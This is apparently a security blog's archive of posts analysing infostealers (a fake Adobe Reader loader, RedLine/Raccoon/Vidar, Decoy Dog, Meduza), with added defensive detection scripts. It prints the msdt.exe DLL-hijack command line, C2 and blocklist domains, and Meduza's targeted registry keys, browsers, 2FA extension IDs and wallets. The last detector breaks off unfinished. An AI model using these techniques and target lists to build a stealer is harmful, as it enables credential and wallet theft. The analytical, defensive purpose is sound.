InfoStealer Archives – Gridinsoft Blog https://gridinsoft.com/blogs/tag/infostealer/ Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Tue, 12 Mar 2024 19:26:13 +0000

Adobe Reader Infostealer Plagues Email Messages in Brazil https://gridinsoft.com/blogs/adobe-reader-infostealer-targets-brazil/ Tue, 12 Mar 2024 19:26:13 +0000

The post Adobe Reader Infostealer Plagues Email Messages in Brazil appeared first on Gridinsoft Blog.
A recent email spam campaign reportedly spreads infostealer malware under the guise of an Adobe Reader installer. Within a forged PDF document there is a prompt to install the Adobe Reader app, which triggers the malware download and installation. Judging by the language of the documents, this malicious activity mainly targets Portugal and Brazil.

Infostealer Spreads in Fake Adobe Reader Installers

The recent attack campaign detected by ASEC Intelligence Center starts with email spam. The messages have a PDF file attached, with its contents in Portuguese. This seriously narrows down the list of countries the campaign is targeting – to Brazil and Portugal. Inside the file there is a pop-up prompt to install Adobe Reader, which is allegedly required to open the document. Short side note – modern web browsers can handle PDFs of any complexity with ease.

Following the instructions in the document triggers the download of a file named Reader_Install_Setup.exe, which obviously mimics the legitimate installer of the program. It even uses the same icon, which makes the fraud even harder to spot at this stage. Running this file, which is in fact a loader, starts the malware execution.

Fake Adobe Reader installer

However, it does not happen instantly – the malware performs a series of actions to pull off a DLL hijack and run the final payload with the highest privileges possible. First, it spawns an executable file, drops a DLL that contains the actual payload, and runs the msdt.exe process. The latter is a genuine Windows diagnostics tool, which the malware uses to call a subordinate service.

"C:\Windows\SysWOW64\msdt.exe" -path "C:\WINDOWS\diagnotics\index\BluetoothDiagnostic.xml" -skip yes

Command line used to call MSDT, specifically its Bluetooth Diagnostic tool.

This service consequently loads the malicious DLL mentioned above. The library, in turn, runs the said executable file, legitimizing the infostealer and providing it with maximum privileges.
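As an added example (not code from the Gridinsoft post or from ASEC), the three steps of that chain, msdt.exe launched from an unexpected parent, msdt.exe loading a DLL from outside the Windows system directories, and msdt.exe spawning an executable from a user-writable location, can be flagged from Sysmon-style process-creation and image-load telemetry. The event shapes, allow-lists and file names below are constructed assumptions; the msdt command line is the one quoted above.

```python
import ntpath

# Directories from which msdt.exe is expected to load DLLs and from which
# its children normally run (constructed allow-list; extend for your estate).
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")
# Parents that normally launch msdt.exe (constructed allow-list; tune locally).
EXPECTED_MSDT_PARENTS = ("explorer.exe", "svchost.exe", "control.exe", "systemsettings.exe")


def _name(path):
    return ntpath.basename(path).lower()


def _under_trusted(path):
    d = ntpath.dirname(path).lower()
    return any(d == t or d.startswith(t + "\\") for t in TRUSTED_DIRS)


def analyze(events):
    """Return [(rule, detail)] for events matching the msdt.exe hijack chain.

    Events are dicts shaped like Sysmon Event ID 1 (ProcessCreate: Image,
    ParentImage, CommandLine) and Event ID 7 (ImageLoad: Image, ImageLoaded).
    """
    findings = []
    for e in events:
        image, parent = _name(e.get("Image", "")), _name(e.get("ParentImage", ""))
        if e["EventID"] == 1 and image == "msdt.exe" and parent not in EXPECTED_MSDT_PARENTS:
            # Step 1: the loader, not a Windows shell component, starts msdt.exe
            findings.append(("msdt_unusual_parent", f"{parent} -> msdt.exe: {e.get('CommandLine', '')}"))
        elif e["EventID"] == 7 and image == "msdt.exe" and not _under_trusted(e.get("ImageLoaded", "")):
            # Step 2: msdt.exe picks up a DLL from a user-writable location (sideload)
            findings.append(("msdt_sideload", e["ImageLoaded"]))
        elif e["EventID"] == 1 and parent == "msdt.exe" and not _under_trusted(e.get("Image", "")):
            # Step 3: the hijacked DLL launches the dropped payload from msdt.exe's context
            findings.append(("msdt_spawned_untrusted_child", e["Image"]))
    return findings


# Constructed sample telemetry (not real logs); paths and names are placeholders,
# except the msdt command line, which is the one quoted in the post.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\msdt.exe",
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\dropped_stage.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\msdt.exe" -path "C:\WINDOWS\diagnotics\index\BluetoothDiagnostic.xml" -skip yes'},
    {"EventID": 7, "Image": r"C:\Windows\SysWOW64\msdt.exe",
     "ImageLoaded": r"C:\Users\victim\AppData\Local\Temp\hijacked_placeholder.dll"},
    {"EventID": 7, "Image": r"C:\Windows\SysWOW64\msdt.exe",
     "ImageLoaded": r"C:\Windows\SysWOW64\kernel32.dll"},  # benign system DLL
    {"EventID": 1, "Image": r"C:\Users\victim\AppData\Local\Temp\stealer_placeholder.exe",
     "ParentImage": r"C:\Windows\SysWOW64\msdt.exe", "CommandLine": "stealer_placeholder.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\msdt.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "msdt.exe"},  # benign launch
]

if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Each rule alone is noisy on a busy host; the value is in the sequence, so correlate the three findings on the same host within a short window before alerting.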

Stealer Malware Analysis

Even though the malware used in the campaign appears to be unique and does not belong to any known malware family, its functionality can barely be called unusual. This infostealer gathers basic information about the system, sends it to the command server and then creates a directory to store the collected data. The malware adds this directory to the list of Microsoft Defender exclusions, so that Defender will not disrupt its operations. It also mimics a legitimate Chrome folder by adding a fake executable and some of the files typical for a genuine browser folder.

Browser folder copy infostealer
A fake browser folder created by the infostealer to keep the collected data

The C2 servers used by some of the samples confirm the targeting hypothesis mentioned above. Hxxps://thinkforce.com[.]br/ and hxxps://blamefade.com[.]br/ receive the AutoFill data from all the browsers. While this is less than what modern infostealers typically gather, it still makes sense – browsers keep almost all of our passwords.

How to protect against infostealer malware?

Information stealers were never an underdog of the malware world, and they remain a potent threat regardless of the circumstances. However, even though their samples may feature outstanding anti-detection tricks, they still need to get in. And this is where you can stop them most efficiently.

Be careful with emails. Email spam is probably going to be the most widespread malware delivery method of this decade. Users tend to believe its content or simply ignore the related risks, which inevitably leads to malware infection. Such a sketchy offer to install a long-forgotten app, or to perform an action that is not normally needed for this type of document, should raise suspicion. At the same time, the texts of such messages may be ridiculous enough to make the fraud apparent.

Use official software sources. Some files do require specific software, but try to use only official distributions of it. Going to the developer’s site and downloading it does not take much longer than clicking a link.

Have decent anti-malware software on hand. Malware finds new ways of spreading pretty much every day. To avoid falling victim to the trickiest samples, software that will not allow them to get in is essential. GridinSoft Anti-Malware is a program that provides real-time protection and network filters with hourly updates. This security tool will make sure that malware does not even launch in the first place.

Infostealers: How to Detect, Remove and Prevent them? https://gridinsoft.com/blogs/infostealers-detect-remove-prevent/ Fri, 28 Jul 2023 21:59:31 +0000
The flow of information is crucial in today’s world, but it’s also precious to cybercriminals. They target personal data stored on your device through infostealer malware, putting your information at risk. Experts have marked a significant rise in the spread of information-stealing malware, also known as infostealers or stealers. In Q1 2023, the number of incidents more than doubled, indicating a concerning trend that threatens organizations worldwide.

What is an Infostealer?

Infostealer is malicious software that collects information on a device it has infected and sends it to a threat actor. It explicitly targets login credentials saved in web browsers, browsing history, credit card and cryptocurrency wallet information, location data, device information, emails, social media platforms, and instant messaging clients – anything valuable.

When the malware finds valuable information, it saves it into a specific directory on the disk. Then, at the end of the entire procedure, the malware packs this directory and sends it to the command server. The most valuable information threat actors seek is account details and banking card information. They can use this data themselves or sell it on dark web markets. Infostealer logs are highly profitable on underground marketplaces, which makes them a prevalent form of malware.

Stealer   Number of available logs
Raccoon   2,114,549
Vidar     1,816,800
RedLine   1,415,458
Total     5,350,640

Number of infostealer logs available for sale on the darknet at the end of February 2023.

Around 2020, infostealers got their minute of fame, which keeps going even today, in 2023. Such a surge defined 3 leaders of the “industry” – Raccoon, Vidar, and RedLine Stealer. Security experts have also noticed that these types of malware have been used to steal ChatGPT accounts. This highlights how cybercriminals use stealers to gain access to individuals’ private information.

RedLine

In March 2020, RedLine appeared on the Russian market and quickly became a top seller in the logs category. This malicious software is designed to steal sensitive information from web browsers, including saved login credentials, autocomplete data, credit card information, and cryptocurrency wallets. Once it infects a system, RedLine thoroughly inventories the username, location data, hardware configuration, and installed security software. It is distributed through various means, including cracked games, applications, services, phishing campaigns, and malicious ads.

RedLine infostealer
RedLine Telegram channel showing prices and deals

Raccoon

In 2019, Raccoon Stealer was first introduced under a malware-as-a-service (MaaS) model and was promoted on underground forums. Later, the scoundrels switched to selling their “product” in Telegram groups. In 2022, Raccoon received a new update which spruced up the detection evasion mechanism and added new functionality. Interestingly enough, the hacker community tends to dislike this infostealer and sprinkles it with dirt on forums. According to a common belief, its admins steal the most “juicy” logs.

Raccoon infostealer
Raccoon Stealer Telegram channel

Vidar

Vidar is a classic example of a hit-and-run infostealer. In 2019, Vidar was first noticed during a malvertising campaign where the Fallout exploit kit was employed to disseminate Vidar and GandCrab as secondary payloads. This malicious software is sold as a standalone product on underground forums and Telegram channels, and it includes an admin panel that allows customers to configure the malware and then keep track of the botnet.

Vidar infostealer
Vidar infostealer admin panel

This program is written in C++ and is based on the Arkei stealer. Vidar can extract browser artifacts, the contents of specific cryptocurrency wallets, PayPal data, session data, and screenshots. Once done, it performs a so-called meltdown – in other words, it simply removes itself from the machine.

How do infostealers get in?

Hackers may employ various methods to spread infostealers. The most prevalent attack vectors are:

  • Pirated software
    It is common for hacking groups to include malware with pirated software downloads. Infostealers and other types of malware have been distributed through pirated software before.

  • Malvertising
    It’s common for exploit kits to target websites with malicious advertisements. If you click on one of these ads, you might unknowingly install an infostealer or be redirected to a website with malware available for download. Sometimes just viewing the malicious advertisement is enough to trigger the infostealer download.

  • Compromised system
    Infostealers are typically installed from a remote location once the attackers have successfully accessed the target system. As a result, a compromised system becomes an open book for hackers.

  • Spam
    It is common for malicious individuals to send infostealers through email, often pretending to be a legitimate organization. The infostealer can either be attached directly to the email, or the recipient may be tricked into clicking on a harmful link, leading to the malware download. These spam emails are usually sent to large groups, but sometimes they can be customized for a specific individual or group.

How to Protect your system from infostealers?

Here are some practices that can help lower the risk of getting infected with an infostealer:

  • Install updates
    One way infostealers can be distributed is by using known browser vulnerabilities. To reduce the risk of this happening, it is vital to install updates for your operating system, browser, and other applications as soon as they become available.
  • Think twice before clicking
    Be careful when opening files and clicking links, because infostealers often spread through malicious email attachments and harmful websites. Don’t open unsolicited email attachments. Be cautious of emails that don’t address you by name. Check URLs before clicking them.
  • Use multi-factor authentication
    Multi-factor authentication (MFA) is a valuable security feature that protects against unauthorized access to accounts, tools, systems, and data repositories. So, if someone steals your login credentials, MFA requires a secondary form of authentication, making it more difficult for a threat actor to access the compromised account. Secure password storage may be a useful add-on option as well.
  • Avoid pirated software
    It is common for pirated software to contain malware, as it is a way for pirates to earn money. Therefore, it is best to use legitimate applications. Nowadays, there are numerous free, freemium, and open-source alternatives available that eliminate the need to take the risk of using pirated software.
  • Have anti-malware software as a back-up
    You never know what trick hackers will pull next, and playing what-ifs is a bad idea. For that case, it is better to have a versatile tool on hand that will help you detect and remove malicious programs. GridinSoft Anti-Malware is one you can rely on – give it a try.

Decoy Dog Malware Uncovered: Next-Gen Spyware https://gridinsoft.com/blogs/decoy-dog-spyware-rat/ Fri, 28 Jul 2023 07:41:57 +0000
A group of hackers, presumably state-sponsored, is actively developing and beginning to use a sophisticated Decoy Dog toolkit. It has likely been used for over a year in cyber intelligence operations. It utilizes the Domain Name System (DNS) to manage and control a narrowly focused and minimal number of active clients.

What is Decoy Dog Malware?

In April, researchers discovered Decoy Dog, a remote access trojan (RAT) toolkit that uses DNS domains acting as command and control (C2) servers for the malware. It caused abnormal DNS signatures in enterprise networks across various regions, and some communications were being sent to a controller in Russia. The researchers then discovered DNS query patterns in enterprise networks that were not linked to consumer devices. They confirmed that the queries came from network appliances in only a few customer networks. Despite the researchers’ announcement and technical analysis of this malware’s similarity to the Pupy open-source RAT, the toolkit’s operators continued their activity. At that time, it used the following domains, which experts recommended organizations to block:

  • claudfront[.]net
  • allowlisted[.]net
  • atlas-upd[.]com
  • ads-tm-glb[.]click
  • cbox4[.]ignorelist[.]com
  • hsdps[.]cc

However, new research reveals that Decoy Dog is a significant improvement over Pupy, utilizing new domains, unique commands, and configurations that are not publicly available. Pupy is an open-source post-exploitation remote access toolkit that emerged in 2015. Its primary purpose was serving as a RAT in penetration testing simulations. The configs mentioned as unavailable were hidden until 2019, and are related to the way the malware resolves the C2 DNS. But even with the code in hand, one needed to perform a thorough name server setup for each malware run – a complicated task worthy of network engineers.

How Decoy Dog works scheme
How Decoy Dog works

Decoy Dog Is a Better Pupy RAT

Researchers have been investigating the differences between Decoy Dog and Pupy since April. They set up their own C2 server for Pupy to analyze its DNS communication protocol, which let them create DNS signatures to detect new controllers of this malware. Pupy and Decoy Dog both use nonces to identify sessions with clients and establish the ordering of messages, and Decoy Dog uses the same query structure as Pupy. So, researchers decoded the nonce values and correlated queries to the same compromised device.

Moreover, researchers could track each controller’s activity, including the length of sessions and the number of active clients. Unfortunately, encryption prevented researchers from seeing the specific data communicated, but they identified the types of messages sent and profiled the overall communication behavior of both clients. Decoy Dog responds to replays, while Pupy does not, and has a richer set of commands and responses. The malware also exhibits more variance in message payload length than Pupy.

From this, researchers confirmed that Decoy Dog is a major refactor of Pupy with advanced capabilities that have changed over time. It includes a domain generation algorithm and the ability for clients to execute arbitrary Java code. These features indicate sophistication and intentionality beyond many threat actors. Security vendor detectors still identify Decoy Dog as Pupy, possibly since reverse engineers assumed the binary samples were identical.

Today’s activity

Decoy Dog’s creators quickly adjusted their system in response to its initial disclosure. The malware has expanded its reach, with at least three different actors now using it. Thus, they ensured uninterrupted operations and retained access to previously compromised devices. Though based on the open-source RAT Pupy, researchers have identified Decoy Dog as a new and previously unknown form of malware with advanced features that allow it to persist on compromised machines. Today’s research shows how Decoy Dog has significantly improved over Pupy. The former utilizes unique commands and configurations that are not publicly available. Threat actors use it in ongoing nation-state cyber-attacks, establishing command and control through DNS.

Decoy Dog activity
Decoy Dog controller domains activity after the release of Infoblox’s papers

While much about Decoy Dog remains unclear, specialists determined that the malware can only be detected through DNS threat detection algorithms. At least three threat actors have been identified using this malware, which is based on the open-source remote access trojan called Pupy. However, significant changes to the code suggest the involvement of a sophisticated black hat. The security firm stated that Decoy Dog can respond to complex DNS requests that do not follow the typical communication structure. In addition, they specified that Pupy, which is associated with Decoy Dog, is a cover-up for the actual abilities of the program.
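The post says Decoy Dog is only caught by DNS threat detection, and that its query structure carries per-session nonces. As an added example (not the researchers’ signatures, which are not reproduced on this page), the heuristic below flags a client that sends many distinct, high-entropy subdomain labels to one apex domain, the shape that nonce-bearing DNS C2 and DGA traffic leave in resolver logs. The log format, thresholds and sample lines are constructed; the C2 apex is one of the domains listed above.

```python
import math
from collections import Counter, defaultdict

# Constructed sample resolver log (not real traffic): "<timestamp> <client_ip> <qname>".
# The first six lines imitate nonce-style labels sent to a listed Decoy Dog apex;
# the rest are ordinary lookups that must not be flagged.
SAMPLE_LOG = """
2023-07-20T10:00:01Z 10.0.0.5 q7k2m9x4p1z8v3n6.claudfront.net
2023-07-20T10:00:02Z 10.0.0.5 a5b8c1d4e7f0g2h9.claudfront.net
2023-07-20T10:00:03Z 10.0.0.5 z1y2x3w4v5u6t7s8.claudfront.net
2023-07-20T10:00:04Z 10.0.0.5 j0k9l8m7n6o5p4q3.claudfront.net
2023-07-20T10:00:05Z 10.0.0.5 r2s4t6u8v0w1x3y5.claudfront.net
2023-07-20T10:00:06Z 10.0.0.5 b9c7d5e3f1g8h6i4.claudfront.net
2023-07-20T10:00:07Z 10.0.0.7 www.example.com
2023-07-20T10:00:08Z 10.0.0.7 mail.example.com
2023-07-20T10:00:09Z 10.0.0.7 cdn.example.com
"""


def shannon_entropy(s):
    """Bits of entropy per character of the label s (0.0 for the empty string)."""
    if not s:
        return 0.0
    counts, n = Counter(s), len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def apex_and_label(qname):
    """Return (apex, leftmost_label) for names with at least one subdomain.

    Simplification (assumption): the apex is the last two labels; public-suffix
    domains such as example.co.uk are not handled and would need a suffix list.
    """
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) < 3:
        return None, None
    return ".".join(labels[-2:]), labels[0]


def find_dns_c2_candidates(log_text, min_unique=5, min_entropy=3.0):
    """Flag (client, apex) pairs with many distinct, high-entropy subdomain labels."""
    seen = defaultdict(set)
    for line in log_text.strip().splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue  # malformed line; skip rather than crash the sweep
        client, qname = parts[1], parts[2]
        apex, label = apex_and_label(qname)
        if apex:
            seen[(client, apex)].add(label)
    hits = {}
    for key, labels in seen.items():
        if len(labels) < min_unique:
            continue  # a handful of hostnames is normal web browsing
        mean_h = sum(shannon_entropy(l) for l in labels) / len(labels)
        if mean_h >= min_entropy:
            hits[key] = {"unique_subdomains": len(labels), "mean_entropy": round(mean_h, 2)}
    return hits


if __name__ == "__main__":
    for (client, apex), stats in find_dns_c2_candidates(SAMPLE_LOG).items():
        print(f"{client} -> {apex}: {stats}")
```

Run it over a day of resolver logs per client rather than per line, and pair a hit with the page’s other signal: the query volume stays low and steady, unlike a DGA beacon that churns hundreds of apexes.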

Threat Actors Use Decoy Dog for Precise Hacking

Based on the analysis of passive DNS traffic, analysts have difficulty determining the exact number of Decoy Dog targets and affected devices. However, the lowest and highest numbers of active concurrent connections detected by investigators on any one controller were 4 and 50, respectively. In addition, the number of compromised devices is less than a few hundred. This indicates a minimal target list, typical of a reconnaissance operation. In any case, experts suggest that well-secured and sophisticated attackers are using the malware.

The attackers are likely targeting specific organizations with high information value. As mentioned above, there is a possibility that the victims are located in Russia. However, experts do not rule out that the attackers directed the victims’ traffic through this region as bait or to limit requests to relevant ones. Since it is quite difficult to change this system in modern networks, Decoy Dog behaves similarly to Pupy and uses the default recursive resolver to connect to DNS.

Safety recommendations

Security measures against Decoy Dog are generally similar to basic cyber security recommendations. However, there are key points to consider first. Here are some safety recommendations against this malware:

  • Keep your software up to date. Auto-update should be enabled by default because it includes security patches that can help to protect your devices from malware.
  • Use a firewall and antivirus software. A firewall can help to block unauthorized traffic from reaching your devices, and antivirus software can help to detect and remove malware.
  • Be careful on the web. Look at what websites you visit and what links you click on. Decoy Dog can be spread through malicious websites and links.
  • Use strong passwords and change them regularly. While this is a general recommendation, it is essential because strong passwords can protect your accounts from unauthorized access.
  • Be aware of the signs of malware infection. Some symptoms include the computer running slowly, pop-ups and new programs appearing that you didn’t initiate, your browser settings changing, and files disappearing.

If you think your computer may be infected with Decoy Dog, contact your IT security team immediately. They will be able to help you to remove the malware and protect your organization from further attacks.

Web safety tips

Here are some additional tips to help you stay safe while web surfing:

  • Use VPN when connecting to public Wi-Fi. This will help to protect your traffic from being intercepted by malicious actors.
  • Be careful about what information you share online. Don’t share your personal information, such as your Social Security or credit card number, with websites or individuals you don’t trust.
  • Educate yourself about malware and how to protect yourself from it. Forewarned is forearmed. There is a lot of helpful, valuable information in the public domain today to help you keep up to date with the latest developments in cybersecurity.

By following these tips, you can help to protect yourself from Decoy Dog and other malware.

Meduza Stealer: What Is It & How Does It Work? https://gridinsoft.com/blogs/meduza-stealer-analysis/ Wed, 19 Jul 2023 14:20:31 +0000
The Malware world evolves constantly, and it would be reckless to ignore newcomers and their potential. Meduza Stealer appears to be a pretty potent stealer variant with its unique features and marketing model. Additionally, this malware may be considered a firstling of a new malware generation – one which breaks old geolocation filtering rules.

What is Meduza Stealer?

Meduza is an all-encompassing infostealer, which at a glance is somewhat similar to the old guard. However, well-known stealers such as RedLine or Raccoon gained the ability to steal cryptocurrency information only with later updates. Meduza, on the other hand, can do this out of the box, and can circumvent the trickier protection measures of crypto apps. Moreover, it includes a much bigger list of wallets and browsers it can extract data from than any of the mentioned stealers.

The distinctive feature of Meduza Stealer is the way it hides its samples. Instead of the usual packing, the hackers use code obfuscation and recompiling, which allows them to circumvent even the most robust anti-malware engines. These approaches do not sound like anything phenomenal, but when applied together, and in an unusual way, things become far less predictable – and detectable.

Though, this is not the full list of unusual things about this malware. Price-wise, the malware offers 2 fixed plans and a negotiable lifetime license. For $199 you receive the malware, all possible customization options for the payload, the admin panel, and the ability to download all the logs in one click, for a term of 1 month. The hackers offer the same package for $399 for 3 months. And the cherry on top, as I said, is the ability to negotiate the price of a lifetime license for this malware. Probably, the malware developers are even ready to share the source code – but that is only a guess, based on groups that used such a model earlier.

Meduza Stealer in Telegram
Promotion of Meduza Stealer in Telegram. Channels are exclusively Russian.

An Offspring of Aurora Stealer?

There are plenty of examples of how brand-new malware turns out to be a re-branded old sample, with a slightly different team of crooks behind it. Malware is rarely developed by a single person. Developers of one malware may start working on another, and bring their prior developments into the new product. Alternatively, part of a cybercrime gang that stopped functioning may decide to resume their illegal deeds – and rebrand their “tools” to start with a new image. One way or another, this is a common occurrence.

In the case of Meduza Stealer, things are not that straightforward. Due to the use of enhanced obfuscation, it is hard to say whether it shares any code details with known malware families. Some malware analysts claim that Meduza is an offspring of Aurora Stealer – malware that popped out in late 2022. Their main arguments are similarity in the form of C2 calls and logs with collected data.

Aurora vs Meduza Logs
Similarity in logs of Aurora and Meduza Stealers

As you can see, Meduza’s logs resemble Aurora’s in the ASCII-styled header and some visual elements. However, this is not definitive – malware developers sometimes take inspiration from, or completely copy, things from other malware families. Other details that researchers find suspicious are the file naming policies – but this is not strong proof either.

This, however, caused a harsh reaction from the malware developers. In their “support” channel they called all the proofs rubbish, and also said they had picked up the trail of the one who leaked the malware build. There is also decent evidence that supports Meduza’s originality – it is written in C++, which is not even close to the Golang used in Aurora Stealer.

Developers Rant
The reaction of Meduza developer to the analyst’s claims about the malware being Aurora stealer copy

Meduza Stealer Analysis: Catch Me or I Catch You

The threat that comes from each specific malware sample roughly depends on two factors: how hard it is to detect it and how much damage it can deal. Meduza Stealer tries to outpace its counterparts in these two factors. It is not the most stealthy malware, for sure, and there are ones that steal even more data, but rare samples may boast of a combination of these two. And Meduza does.

Meduza Stealer Exec Chain

In the picture above you can see the simplified scheme of the Meduza Stealer operation process. First of all, it checks the geolocation of the attacked system by its IP address. There lies another unusual feature of this malware — it has a typical ban list of countries for malware from Russia, though it does not include Ukraine. Instead, malware will exit once the IP of the attacked system is in Georgia. The latter has become quite a popular destination among Russians who try to avoid enlistment in the army. Overall, malware will not run in Armenia, Belarus, Georgia, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan and Turkmenistan.

Excluded Countries
Code in the malware’s PE file that bans its execution in certain countries.

The very next step is contacting the C2 server. This step is not very common among stealers, which prefer to contact the C2 only after succeeding with the data theft. Instead, Meduza contacts the server immediately after ensuring that the system is not in a forbidden location – but without any further action. The malware sends a blank POST request, which does not receive any response from the server. Only once the connection succeeds will the malware keep going.

Data Gathering

As I said, Meduza is distinctive for the outrageously wide range of web browsers, desktop apps, and crypto-wallets it can rummage through. More common malware samples usually stop at the most popular apps and wallets, including some alternative options. This one, however, does not disdain even the underdogs. Kinza, Mail.ru, Atom, Amigo – some of them are even considered PUPs by security vendors, and I bet you didn’t even know that some of them exist.

List of browsers Meduza gathers data from:

Chrome Chrome Beta Chrome SxS 360ChromeX ChromePlus
Chromium Edge Brave Browser Epic Privacy Browser Amigo
Vivaldi Kometa Orbitum Atom Comodo Dragon
Torch Comodo Slimjet 360Browser 360se6
Baidu Spark Falkon AVAST Browser Waterfox BitTubeBrowser
NetboxBrowser Mustang InsomniacBrowser Maxthon Viasat Browser
Opera Stable Opera Neon Opera Crypto Developer Opera GX Stable QQBrowser
SLBrowser K-Meleon Go! Secure Browser Sputnik
Nichrome CocCoc Browser Uran Chromodo YandexBrowser
7Star Chedot CentBrowser Iridium Naver Whale
Titan Browser SeaMonkey UCBrowser CLIQZ Flock
BlackHawk Sidekick Basilisk GhostBrowser GarenaPlus
URBrowser IceDragon CryptoTab Browser Pale Moon Superbird
Elements Browser Citrio Xpom ChromiumViewer QIP Surf
Liebao Coowon Suhba TorBro RockMelt
Bromium Kinza CCleaner Browser AcWebBrowserr CoolNovo
SRWare Iron Mozilla Firefox AVG Browser Thunderbird Blisk
Cyberfonx SwingBrowser Mozilla IceCat SalamWeb SlimBrowser

Browsers commonly have different ways to handle passwords and autofill info – and the malware has an approach for each one. For those that store such data in databases, the malware prepares an SQL query that simply extracts all the valuables. Other, less secure browsers keep this info in a plain text file – which is not a big quest to find.

One more point of interest for stealer malware in web browsers is cookie files. Cookies can contain different things – from almost useless shopping cart contents to session tokens, usernames, emails, and the like. Cookie files can be of great value when it comes to data stealing – especially when they are fresh. One may say, just like real ones.

Desktop apps

Aside from web browsers, Meduza Stealer gathers information from several desktop applications, namely Telegram, Steam, and different Discord clients. To put its hands on Steam session tokens, malware gets to the program’s registry key in the CurrentUser branch. The HKCU\Software\Valve\Steam key contains a lot of info, aside from login data and session information – so malware does not go purely for the account.

Telegram does not keep login details in such an accessible form, though the malware manages to gather sensitive information similarly. By checking the two keys below, Meduza can get information about the system kept in Telegram session info, app versions, usernames, and other important stuff.

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C4A4AE8F-B9F7-4CC7-8A6C-BF7EEE87ACA5}_is1

Discord is also a tough nut when it comes to grabbing session info. For that reason, the malware limits itself to the system information recorded in a session, app configuration and the like. Unlike with the two other apps, this is done directly in the program’s folder. The malware goes after several different editions of Discord, as the free API allows creating forks and user modifications.

2FA Extensions

Well, did I say that Meduza is ravenous when it comes to data gathering? Hold your 2FA browser extensions close to your body – the malware hunts them as well. The list of add-ons it targets is not as long as the list of browsers, though there are not that many such extensions to begin with.

Extension name Web Store ID
Authenticator 2FA bhghoamapcdpbohphigoooaddinpkbai
Authenticator 2FA ocglkepbibnalbgmbachknglpdipeoio
EOS Authenticator oeljdldpnmdbchonielidgobddffflal
Trezor Password Manager imloifkgjagghnncjkhggdhalmcnfklk
GAuth Authenticator ilgcnhelpchnceeipipijaljkblbcobl
1Password oeljdldpnmdbchonielidgobddffflal
1Password dppgmdbiimibapkepcbdbmkaabgiofem
Dashlane Password Manager fdjamakpfbbddfjaooikfcpapjohcfmg
Dashlane Password Manager gehmmocbbkpblljhkekmfhjpfbkclbph
Bitwarden Password Manager nngceckbapebfimnlniiiahkandclblb
Bitwarden Password Manager jbkfoedolllekgbhcbcoahefnbanhhlh
NordPass jbkfoedolllekgbhcbcoahefnbanhhlh
Keeper Password Manager bfogiafebfohielmmehodmfbbebbbpei
RoboForm pnlccmojcmeohlpggmfnbbiapkmbliob
RoboForm ljfpcifpgbbchoddpjefaipoiigpdmag
SSO Authenticator nhhldecdfagpbfggphklkaeiocfnaafm
Zoho Vault igkpcodhieompeloncfnbekccinhapdb
KeePassXC dppgmdbiimibapkepcbdbmkaabgiofem
KeePassXC pdffhmdngciaglkoonimfcmckehcpafo
LastPass hdokiejnpimakedhajhdlcegeplioahd
LastPass bbcinlkgjjkejfdpemiealijmmooekmp
BrowserPass naepdomgkenhinolocfifgehidddafch
MYKI bmikpgodpkclnkgmnpphehdgcimmided
MYKI nofkfblpeailgignhkbnapbephdnmbmn
Splikity jhfjfclepacoldmjmkmdlmganfaalklb
CommonKey chgfefjpcobfbnpmiokfjjaglahmnded
Authy gaedmjdfmmahhbjefcbgaolhhanlaolb

Cryptocurrency wallets

Gathering data about crypto wallets was not widespread among older-generation stealers. Over time, most of the families we know and love adopted such functionality. Modern ones have it by default, which probably explains the number of wallets they can gather information from.

MetaMask Binance Wallet BitApp Wallet Coin98 Wallet
SafePal Wallet DAppPlay Guarda EQUA Wallet
GuildWallet Casper Wallet ICONex Math Wallet
Starcoin Hiro Wallet MetaWallet Swash
Finnie Keplr Crocobit Wallet Oxygen
MOBOX WALLET Phantom TronLink XDCPay
Ton Sollet Slope DuinoCoin Wallet
LeafWallet Brave Wallet Opera Wallet CWallet
Flint Wallet Exodus Web3 Wallet Trust Wallet Crypto Airdrops & Bounties
Nifty Wallet Liquality Ronin Wallet Oasis
Temple Pontem Aptos Wallet Solflare Wallet Yoroi
iWallet Wombat Gaming Wallet Coinbase Wallet MEW CX
Jaxx Liberty OneKey Hycon Lite Client SubWallet
Goby TezBox ONTO Wallet Hashpack
Cyano Martian Wallet Sender Wallet Zecrey
Auro Terra Station KardiaChain Rabby Wallet
NeoLine Nabox XDEFI KHC
OneKey CLW Polymesh ZilPay
Byone Eternl Nami Maiar DeFi Wallet

This extensive list contains crypto wallets that can exist both as desktop programs and as browser extensions. For the desktop forms, the malware takes a different route: it collects data from the registry entries they leave behind. Here are some examples of registry keys the malware reads to collect login data from your crypto wallet:

HKCU\SOFTWARE\Etherdyne\Etherwall\geth
HKCU\SOFTWARE\monero-project\monero-core
HKCU\SOFTWARE\BitcoinCore\BitcoinCore-Qt
HKCU\SOFTWARE\LitecoinCore\LitecoinCore-Qt
HKCU\SOFTWARE\DashCore\DashCore-Qt
HKCU\SOFTWARE\DogecoinCore\DogecoinCore-Qt
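The artifacts this post lists (browser password and cookie databases, extension storage keyed by Web Store ID, the Steam and wallet registry keys) are exactly what an endpoint detection can key on. The following is an added example, not code from Meduza or from the post: a small detector run over constructed Sysmon-style file and registry read events; the process names and the profile path are placeholders, and the set of expected readers is an assumption to tune per fleet.

```python
"""Flag credential-store access by processes that have no business touching it."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Web Store IDs quoted in the post's extension table (a subset).
WATCHED_EXTENSION_IDS = {
    "bhghoamapcdpbohphigoooaddinpkbai",  # Authenticator 2FA
    "nngceckbapebfimnlniiiahkandclblb",  # Bitwarden Password Manager
    "hdokiejnpimakedhajhdlcegeplioahd",  # LastPass
    "gaedmjdfmmahhbjefcbgaolhhanlaolb",  # Authy
}

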